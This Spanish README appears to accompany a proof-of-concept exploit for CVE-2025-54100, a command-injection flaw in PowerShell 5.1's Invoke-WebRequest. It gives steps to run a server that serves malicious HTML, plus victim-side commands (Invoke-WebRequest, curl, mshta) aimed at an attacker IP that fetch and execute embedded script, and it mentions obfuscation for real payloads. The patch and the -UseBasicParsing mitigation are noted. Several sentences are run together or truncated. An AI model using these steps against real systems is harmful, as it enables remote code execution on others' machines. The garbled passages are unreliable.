
CVE-2025-54100 (CVSS 7.8 Alto) es una vulnerabilidad de inyección de comandos en el cmdlet Invoke-WebRequest de Windows PowerShell 5.1. Surge de una neutralización incorrecta de elementos especiales durante el análisis automático de respuestas web.
Un Proof-of-Concept conciso que muestra cómo CVE-2025-54100 puede conducir a la Ejecución Remota de Código (RCE) en Windows PowerShell 5.1 a través del análisis malicioso de HTML.
Invoke-WebRequest cuando no se usa -UseBasicParsingActiveXObject) en el contexto del llamante.CVE-2025-54100.py sirve un payload HTML manipulado.WScript.Shell / Shell.Application.calc.exe.python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
Inicie el servidor HTTP del PoC:
uvicorn app:app --host 0.0.0.0 --port 8888 --reload
Ejecute estos comandos en una máquina Windows vulnerable sin -UseBasicParsing:
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://<ip-atacante>:8888"
# alias curl
curl http://<ip-atacante>:8888
# mshta
mshta http://<ip-atacante>:8888
Use el mismo puerto que configuró para el servidor. Si es vulnerable, el script incrustado se ejecuta a través del analizador MSHTML. Algunos productos antivirus pueden bloquear el comportamiento aunque el problema de análisis esté presente.
Si calc.exe no aparece:
Invoke-WebRequest sin -UseBasicParsing.Esto demuestra el vector de ejecución. Los payloads del mundo real pueden usar ofuscación o bypass adicionales para evadir las restricciones predeterminadas.

Microsoft parcheó el problema en diciembre de 2025:
-UseBasicParsing para evitar el análisis MSHTML:
Invoke-WebRequest -Uri "http://<ip-atacante>:8888" -UseBasicParsing
[!WARNING] Solo para fines educativos y pruebas autorizadas. Úselo responsablemente y cumpla con todas las leyes aplicables. Los autores no se hacen responsables por el mal uso o daños.